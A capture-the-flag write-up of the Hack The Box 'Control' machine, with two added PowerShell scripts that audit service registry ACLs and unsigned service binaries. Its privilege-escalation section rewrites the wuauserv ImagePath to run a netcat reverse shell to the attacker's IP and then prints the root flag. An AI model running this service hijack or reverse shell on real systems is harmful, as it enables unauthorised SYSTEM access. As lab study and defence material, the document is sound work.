PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET Data Provider for Oracle
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET Data
BUILTIN\Users Allow ReadKey
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTAGService
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTAGService
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthAvctpSvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthAvctpSvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthEnum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthEnum
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthLEEnum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthLEEnum
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthMini
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthMini
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHPORT
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHPORT
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bthserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bthserv
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHUSB
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHUSB
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bttflt
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bttflt
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\buttonconverter
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\buttonconverter
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_4248c
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4248c
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4afaf
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_4afaf
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4afaf
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_80d08
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_80d08
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_80d08
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_ee306
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_ee306
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_ee306
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ClipSVC
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ClipSVC
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_32
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_32
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_64
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_64
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CmBatt
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CmBatt
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CNG
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CNG
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WlanSvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WlanSvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wlidsvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wlidsvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiAcpi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiAcpi
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiApRpl
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiApRpl
BUILTIN\Users Allow -1610612736
BUILTIN\Users Allow ReadKey
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wmiApSrv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wmiApSrv
BUILTIN\Users Allow -1610612736
BUILTIN\Users Allow ReadKey
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WMPNetworkSvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WMPNetworkSvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Wof
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Wof
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\workerdd
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\workerdd
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WPDBusEnum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WPDBusEnum
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpdUpFltr
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpdUpFltr
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnService
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnService
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4248c
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_4248c
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4248c
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4afaf
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_4afaf
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4afaf
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_80d08
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_80d08
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_80d08
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_ee306
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_ee306
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_ee306
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ws2ifsl
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ws2ifsl
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearch
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearch
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearchIdxPi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WSearchIdxPi
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WudfPf
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WudfPf
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WUDFRd
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WUDFRd
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\xmlprov
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\xmlprov
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{60E8E863-2974-47D1-89E0-E507677AA14F}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{60E8E863-2974-47D1-89E0-E507677AA14F}
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{6D197A8D-04EB-44C6-B602-FF2798EB7BB3}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{6D197A8D-04EB-44C6-B602-FF2798EB7BB3}
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{CB20B026-8E3E-4F7D-88FD-E7FB0E93CF39}
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\{CB20B026-8E3E-4F7D-88FD-E7FB0E93CF39}
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
ABUSING SERVICES
I have a list of service keys over which Hector has full control. The service "wuauserv" is the one to use, as per the hint I received on the HTB forum.
wuauserv is the system service behind the Windows Update feature. It only runs while Windows Update is active: it runs for a couple of minutes, checks whether an update is in progress, and stops itself again if nothing is going on.
*Evil-WinRM* PS C:\Users\Hector\Documents> Get-ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv
Get-ItemProperty HKLM:\System\CurrentControlSet\services\wuauserv
DependOnService : {rpcss}
Description : @%systemroot%\system32\wuaueng.dll,-106
DisplayName : @%systemroot%\system32\wuaueng.dll,-105
ErrorControl : 1
FailureActions : {128, 81, 1, 0...}
ImagePath : C:\Windows\system32\svchost.exe -k netsvcs -p
ObjectName : LocalSystem
RequiredPrivileges : {SeAuditPrivilege, SeCreateGlobalPrivilege, SeCreatePageFilePrivilege, SeTcbPrivilege...}
ServiceSidType : 1
Start : 3
SvcMemHardLimitInMB : 246
SvcMemMidLimitInMB : 167
SvcMemSoftLimitInMB : 88
Type : 32
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wuauserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : wuauserv
PSDrive : HKLM
PSProvider : Microsoft.PowerShell.Core\Registry
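The get-acl | findstr one-liner above is tedious to read by hand and only matches one user name. The following audit script is an added example, not part of the original writeup: it walks every service key, keeps only Allow entries that grant write-type rights to a principal outside a trusted set, and tags each hit with the account the service runs as, because a writable key on a LocalSystem service (ObjectName : LocalSystem, as in the wuauserv dump above) is exactly the privesc path this box is built around. The trusted-principal list and the rights mask are my own choices, and it needs to run as an administrator to read every key.

```powershell
# Added example, not code from the original writeup: find service registry keys whose
# ACL lets a non-privileged principal change the service definition. Whoever can
# set ImagePath or ObjectName on such a key decides what runs (and as whom) the next
# time the service starts. Assumptions: the trusted list and the mask below are mine.

$TrustedPrincipals = @(
    'NT AUTHORITY\SYSTEM',
    'BUILTIN\Administrators',
    'NT SERVICE\TrustedInstaller',
    'CREATOR OWNER'
)

# Specific rights that change values or the ACL itself, plus the generic
# GENERIC_WRITE / GENERIC_ALL bits. Get-Acl prints generic masks as large negative
# numbers; the "-1610612736" entries above are GENERIC_READ|GENERIC_EXECUTE, i.e. harmless.
$WriteMask = 0x2        -bor   # SetValue
             0x4        -bor   # CreateSubKey
             0x10000    -bor   # Delete
             0x40000    -bor   # ChangePermissions
             0x80000    -bor   # TakeOwnership
             0x40000000 -bor   # GENERIC_WRITE
             0x10000000        # GENERIC_ALL

function Find-WritableServiceKeys {
    param([string[]]$Trusted = $TrustedPrincipals)

    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $key = $_
        $acl = Get-Acl -Path $key.PSPath -ErrorAction SilentlyContinue
        if (-not $acl) { return }   # unreadable key: nothing to report
        foreach ($ace in $acl.Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($Trusted -contains $ace.IdentityReference.Value) { continue }
            if ((([int]$ace.RegistryRights) -band $WriteMask) -eq 0) { continue }
            $props = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
            [pscustomobject]@{
                Service   = $key.PSChildName
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.RegistryRights
                Inherited = $ace.IsInherited
                RunsAs    = $props.ObjectName
                ImagePath = $props.ImagePath
            }
        }
    }
}

# LocalSystem services with a user-writable key are the worst case; list them first.
Find-WritableServiceKeys |
    Sort-Object @{ Expression = { $_.RunsAs -eq 'LocalSystem' }; Descending = $true }, Service |
    Format-Table -AutoSize
```

On the Control box this reports every key in the listing above with Principal CONTROL\Hector and Rights FullControl. A clean Windows install grants ordinary users ReadKey at most on these keys, so any non-inherited write entry for a user or for Authenticated Users is worth comparing against a known-good host and removing with Set-Acl.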
If you remember the retired machine Helpline, I exploited the Windows print spool service to run my nc.exe. I am going to use the same approach on this machine.
*Evil-WinRM* PS C:\inetpub\wwwroot\uploads> copy nc.exe C:\windows\system32\spool\drivers\color\nc.exe
*Evil-WinRM* PS C:\Users\Hector\Documents> reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.11 4444 -e cmd" /f
reg add "HKLM\System\CurrentControlSet\services\wuauserv" /t REG_EXPAND_SZ /v ImagePath /d "C:\windows\system32\spool\drivers\color\nc.exe 10.10.14.11 4444 -e cmd" /f
The operation completed successfully.
*Evil-WinRM* PS C:\Users\Hector\Documents>
START LISTENING:
root@kali:~/htb# rlwrap nc -nlvp 4444
listening on [any] 4444 ...
START SERVICE
*Evil-WinRM* PS C:\Users\Hector\Documents>
*Evil-WinRM* PS C:\Users\Hector\Documents> Start-Service wuauserv
Start-Service wuauserv

*Evil-WinRM* PS C:\Users\Hector\Documents> get-service wuauserv

Status   Name               DisplayName
------   ----               -----------
Stopped  wuauserv           Windows Update

*Evil-WinRM* PS C:\Users\Hector\Documents> start-service wuauserv
REVERSE SHELL AS ADMINISTRATOR
root@kali:~/htb# rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.167] 50826
Microsoft Windows [Version 10.0.17763.805]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>cd /
C:\>cd Users/Administrator/Desktop
C:\Users/Administrator/Desktop>type root.txt
d8782dd01fb15b72c4b5ba77ef2d472b

*Evil-WinRM* PS C:\Users\Hector\Documents> sc.exe query wuauserv

SERVICE_NAME: wuauserv
        TYPE               : 20  WIN32_SHARE_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

*Evil-WinRM* PS C:\Users\Hector\Documents> get-process

Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------

*Evil-WinRM* PS C:\Users\Hector\Documents> taskkill.exe /f /pid 728
SUCCESS: The process with PID 728 has been terminated.
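The reg add step above is a one-line change to ImagePath, and nothing in the default event logs flags it, so a defender needs a way to spot service definitions that no longer point at a trusted, signed binary. The script below is an added example, not from the original writeup: it extracts the executable from each service's ImagePath, checks where it lives and whether it carries a valid Authenticode signature, and reports everything that fails either test. The directory allow-list is my assumption; the function names are mine.

```powershell
# Added example, not code from the original writeup: flag services whose ImagePath
# points at a binary outside the usual system locations or that is not validly
# Authenticode-signed. The hijacked wuauserv above would be reported because
# nc.exe carries no signature, even though spool\drivers\color sits under
# %SystemRoot%. Assumption: the allow-listed roots below are my choice.

$ExpectedRoots = @(
    "$env:SystemRoot\",
    "$env:ProgramFiles\",
    "${env:ProgramFiles(x86)}\"
)

function Get-ServiceExecutable {
    # Pull the executable out of an ImagePath such as
    #   C:\Windows\system32\svchost.exe -k netsvcs -p
    #   "C:\Program Files\Vendor\svc.exe" /arg
    #   \SystemRoot\system32\drivers\x.sys      (driver-style relative forms)
    param([string]$ImagePath)
    $p = [Environment]::ExpandEnvironmentVariables($ImagePath).Trim()
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -lt 0) { $end = $p.Length }
        $exe = $p.Substring(1, $end - 1)
    } elseif ($p -match '^(.+?\.(exe|sys|dll))(\s|$)') {
        $exe = $Matches[1]            # unquoted path, possibly with spaces, then arguments
    } else {
        $exe = ($p -split '\s+')[0]
    }
    if ($exe -match '^\\SystemRoot\\(.*)')    { $exe = Join-Path $env:SystemRoot $Matches[1] }
    elseif ($exe -match '^\\\?\?\\(.*)')      { $exe = $Matches[1] }
    elseif ($exe -notmatch '^[A-Za-z]:\\')    { $exe = Join-Path $env:SystemRoot $exe }
    return $exe
}

function Find-SuspiciousServiceBinaries {
    Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue |
    ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        if (-not $props.ImagePath) { return }
        $exe = Get-ServiceExecutable -ImagePath $props.ImagePath

        $inExpected = $false
        foreach ($root in $ExpectedRoots) {
            if ($exe.StartsWith($root, [StringComparison]::OrdinalIgnoreCase)) { $inExpected = $true; break }
        }
        $sig = if (Test-Path -LiteralPath $exe) {
            (Get-AuthenticodeSignature -FilePath $exe).Status
        } else { 'FileMissing' }

        if ($inExpected -and $sig -eq 'Valid') { return }   # looks normal, skip
        [pscustomobject]@{
            Service       = $_.PSChildName
            RunsAs        = $props.ObjectName
            Executable    = $exe
            InExpectedDir = $inExpected
            Signature     = $sig
            ImagePath     = $props.ImagePath
        }
    }
}

Find-SuspiciousServiceBinaries | Format-Table -AutoSize
```

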